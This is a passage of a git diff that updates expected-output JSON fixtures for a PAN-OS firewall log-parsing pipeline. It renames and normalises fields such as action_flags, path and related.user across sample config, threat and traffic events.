with, three comma, x4\"; } ", + "client_type": "Web", + "cmd": "edit", + "device_group_hierarchy1": "0", + "device_group_hierarchy2": "0", + "device_group_hierarchy3": "0", + "device_group_hierarchy4": "0", + "device_group_id": "0", + "high_resolution_timestamp": "2024-02-29T11:59:40.421-04:00", + "path": "vsys vsys1 address test123", + "result": "Succeeded", + "sequence_number": "7304387121517691189", + "sub_type": "0", + "type": "CONFIG" + } + }, + "related": { + "hosts": [ + "PA-VM" + ], + "ip": [ + "81.2.69.193" + ], + "user": [ + "admin" ] }, "tags": [ @@ -296,4 +376,4 @@ ] } ] -} \ No newline at end of file +} diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-other-sample.log-expected.json b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-other-sample.log-expected.json index 310a52a1cab..03b3d65dda4 100644 --- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-other-sample.log-expected.json +++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-other-sample.log-expected.json @@ -30,13 +30,13 @@ }, "panw": { "panos": { + "action_flags": "0x0", "admin": "admin", - "after_change_detail": "0x0", - "before_change_detail": "0", "client_type": "Web", "cmd": "set", - "path": " config shared local-user-database user badguy", + "path": "config shared local-user-database user badguy", "result": "Succeeded", + "sequence_number": "0", "sub_type": "0", "type": "CONFIG" } @@ -44,6 +44,9 @@ "related": { "ip": [ "192.168.0.2" + ], + "user": [ + "admin" ] }, "tags": [ @@ -80,13 +83,13 @@ }, "panw": { "panos": { + "action_flags": "0x0", "admin": "admin", - "after_change_detail": "0x0", - "before_change_detail": "0", "client_type": "Web", "cmd": "set", - "path": " config mgt-config users badguy", + "path": "config mgt-config users badguy", "result": "Succeeded", + "sequence_number": "0", "sub_type": "0", "type": "CONFIG" } 
@@ -94,6 +97,9 @@ "related": { "ip": [ "192.168.0.2" + ], + "user": [ + "admin" ] }, "tags": [ @@ -130,12 +136,12 @@ }, "panw": { "panos": { + "action_flags": "0x0", "admin": "admin", - "after_change_detail": "0x0", - "before_change_detail": "0", "client_type": "Web", "cmd": "commit", "result": "Submitted", + "sequence_number": "0", "sub_type": "0", "type": "CONFIG" } @@ -143,6 +149,9 @@ "related": { "ip": [ "192.168.0.2" + ], + "user": [ + "admin" ] }, "tags": [ @@ -339,13 +348,13 @@ }, "panw": { "panos": { + "action_flags": "0x0", "admin": "badguy", - "after_change_detail": "0x0", - "before_change_detail": "0", "client_type": "Web", "cmd": "edit", - "path": " vsys vsys1 profiles url-filtering monzyspolicy", + "path": "vsys vsys1 profiles url-filtering monzyspolicy", "result": "Succeeded", + "sequence_number": "0", "sub_type": "0", "type": "CONFIG" } @@ -353,6 +362,9 @@ "related": { "ip": [ "192.168.0.2" + ], + "user": [ + "badguy" ] }, "tags": [ @@ -389,12 +401,12 @@ }, "panw": { "panos": { + "action_flags": "0x0", "admin": "badguy", - "after_change_detail": "0x0", - "before_change_detail": "0", "client_type": "Web", "cmd": "commit", "result": "Submitted", + "sequence_number": "0", "sub_type": "0", "type": "CONFIG" } @@ -402,6 +414,9 @@ "related": { "ip": [ "192.168.0.2" + ], + "user": [ + "badguy" ] }, "tags": [ @@ -1198,12 +1213,12 @@ }, "panw": { "panos": { + "action_flags": "0x0", "admin": "admin", - "after_change_detail": "0x0", - "before_change_detail": "0", "client_type": "Web", "cmd": "commit", "result": "Submitted", + "sequence_number": "0", "sub_type": "0", "type": "CONFIG" } @@ -1211,6 +1226,9 @@ "related": { "ip": [ "192.168.0.2" + ], + "user": [ + "admin" ] }, "tags": [ 
@@ -1247,13 +1265,13 @@ }, "panw": { "panos": { + "action_flags": "0x0", "admin": "admin", - "after_change_detail": "0x0", - "before_change_detail": "0", "client_type": "Web", "cmd": "edit", - "path": " vsys vsys1 profiles data-objects PII", + "path": "vsys vsys1 profiles data-objects PII", "result": "Succeeded", + "sequence_number": "0", "sub_type": "0", "type": "CONFIG" } @@ -1261,6 +1279,9 @@ "related": { "ip": [ "192.168.0.2" + ], + "user": [ + "admin" ] }, "tags": [ @@ -1480,8 +1501,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -1540,7 +1560,6 @@ "start": "2023-10-04T09:52:21.000+05:45", "timezone": "+05:45", "type": [ - "denied", "denied", "connection" ] diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-threat-sample.log-expected.json b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-threat-sample.log-expected.json index 64f416e1924..f43f1c044f8 100644 --- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-threat-sample.log-expected.json +++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-threat-sample.log-expected.json @@ -134,8 +134,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -302,8 +301,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -471,8 +469,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -640,8 +637,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -809,8 +805,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -978,8 +973,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" 
@@ -1147,8 +1141,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -1315,8 +1308,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -1483,8 +1475,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -1651,8 +1642,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -1820,8 +1810,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -1987,8 +1976,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -2155,8 +2143,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -2322,8 +2309,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -2491,8 +2477,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -2659,8 +2644,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -2825,8 +2809,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -2994,8 +2977,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -3161,8 +3143,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -3328,8 +3309,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -3496,8 +3476,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" 
@@ -3663,8 +3642,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -3831,8 +3809,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -3998,8 +3975,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -4165,8 +4141,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -4332,8 +4307,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -4499,8 +4473,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -4666,8 +4639,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -4833,8 +4805,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -5000,8 +4971,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -5167,8 +5137,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -5334,8 +5303,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -5501,8 +5469,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -5666,8 +5633,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -5833,8 +5799,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -6000,8 +5965,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" 
@@ -6166,8 +6130,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -6333,8 +6296,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -6499,8 +6461,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -6665,8 +6626,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -6831,8 +6791,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -6998,8 +6957,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -7164,8 +7122,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -7319,8 +7276,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "crusher" @@ -7483,8 +7439,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -7648,8 +7603,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -7813,8 +7767,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -7979,8 +7932,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -8144,8 +8096,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -8309,8 +8260,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -8475,8 +8425,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" 
@@ -8641,8 +8590,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -8807,8 +8755,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -8968,8 +8915,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "crusher" @@ -9132,8 +9078,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -9293,8 +9238,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "crusher" @@ -9452,8 +9396,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "crusher" @@ -9616,8 +9559,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -9777,8 +9719,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "crusher" @@ -9936,8 +9877,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "crusher" @@ -10100,8 +10040,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -10266,8 +10205,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -10432,8 +10370,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -10593,8 +10530,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "crusher" @@ -10757,8 +10693,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -10922,8 +10857,7 @@ "related": { "ip": [ "192.168.0.6", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "jordy" 
@@ -11074,8 +11008,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.6", - "0.0.0.0" + "192.168.0.6" ], "user": [ "jordy" @@ -11230,8 +11163,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.6", - "0.0.0.0" + "192.168.0.6" ], "user": [ "jordy" @@ -11393,8 +11325,7 @@ "related": { "ip": [ "192.168.0.6", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "jordy" @@ -11545,8 +11476,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.6", - "0.0.0.0" + "192.168.0.6" ], "user": [ "jordy" @@ -11708,8 +11638,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "picard" @@ -11860,8 +11789,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "picard" @@ -12019,8 +11947,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.6", - "0.0.0.0" + "192.168.0.6" ], "user": [ "jordy" @@ -12175,8 +12102,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "picard" @@ -12331,8 +12257,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "picard" @@ -12487,8 +12412,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "picard" @@ -12643,8 +12567,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "picard" @@ -12806,8 +12729,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "picard" @@ -12958,8 +12880,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "picard" @@ -13114,8 +13035,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "picard" @@ -13270,8 +13190,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "picard" 
@@ -13426,8 +13345,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "picard" @@ -13582,8 +13500,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.6", - "0.0.0.0" + "192.168.0.6" ], "user": [ "jordy" @@ -13738,8 +13655,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "jordy" @@ -13894,8 +13810,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "jordy" @@ -14050,8 +13965,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "jordy" @@ -14206,8 +14120,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "picard" @@ -14362,8 +14275,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "picard" @@ -14518,8 +14430,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "picard" @@ -14674,8 +14585,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "picard" @@ -14837,8 +14747,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "picard" @@ -14989,8 +14898,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "picard" @@ -15145,8 +15053,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "picard" @@ -15308,8 +15215,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "jordy" @@ -15460,8 +15366,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "jordy" @@ -15616,8 +15521,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "jordy" 
@@ -15772,8 +15676,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "jordy" @@ -15928,8 +15831,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "jordy" @@ -16084,8 +15986,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "jordy" @@ -16240,8 +16141,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "jordy" @@ -16400,8 +16300,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "crusher" @@ -16560,8 +16459,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "crusher" @@ -16769,8 +16667,7 @@ ], "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "schmidtdo" @@ -16780,6 +16677,9 @@ "name": "rule1", "uuid": "9d9738ea-f704-4b0f-90cf-a62bcbad0236" }, + "session": { + "start_time": "2022-11-29T12:59:46.000+10:00" + }, "source": { "geo": { "city_name": "Changchun", @@ -17006,8 +16906,7 @@ ], "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "schmidtdo" @@ -17017,6 +16916,9 @@ "name": "rule1", "uuid": "9d9738ea-f704-4b0f-90cf-a62bcbad0236" }, + "session": { + "start_time": "2022-11-29T12:59:46.000+10:00" + }, "source": { "geo": { "city_name": "Changchun", diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic-sample.log-expected.json b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic-sample.log-expected.json index ece09ea9d22..6a85e28bfb5 100644 --- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic-sample.log-expected.json +++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic-sample.log-expected.json 
@@ -92,8 +92,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -213,8 +212,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -334,8 +332,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -455,8 +452,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -576,8 +572,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -697,8 +692,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -818,8 +812,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -939,8 +932,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -1060,8 +1052,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -1181,8 +1172,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -1302,8 +1292,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -1423,8 +1412,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -1544,8 +1532,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -1665,8 +1652,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -1786,8 +1772,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" 
@@ -1907,8 +1892,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -2028,8 +2012,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -2149,8 +2132,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -2270,8 +2252,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -2391,8 +2372,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -2512,8 +2492,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -2633,8 +2612,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -2754,8 +2732,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -2875,8 +2852,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -2996,8 +2972,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -3117,8 +3092,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -3238,8 +3212,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -3359,8 +3332,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -3480,8 +3452,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -3601,8 +3572,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" 
@@ -3722,8 +3692,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -3843,8 +3812,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -3964,8 +3932,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -4085,8 +4052,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -4206,8 +4172,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -4327,8 +4292,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -4448,8 +4412,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -4569,8 +4532,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -4690,8 +4652,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -4808,8 +4769,7 @@ "related": { "ip": [ "192.168.0.100", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ] }, "rule": { @@ -4920,8 +4880,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -5038,8 +4997,7 @@ "related": { "ip": [ "192.168.0.100", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ] }, "rule": { @@ -5150,8 +5108,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -5271,8 +5228,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -5389,8 +5345,7 @@ "related": { "ip": [ "192.168.0.100", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ] }, "rule": { 
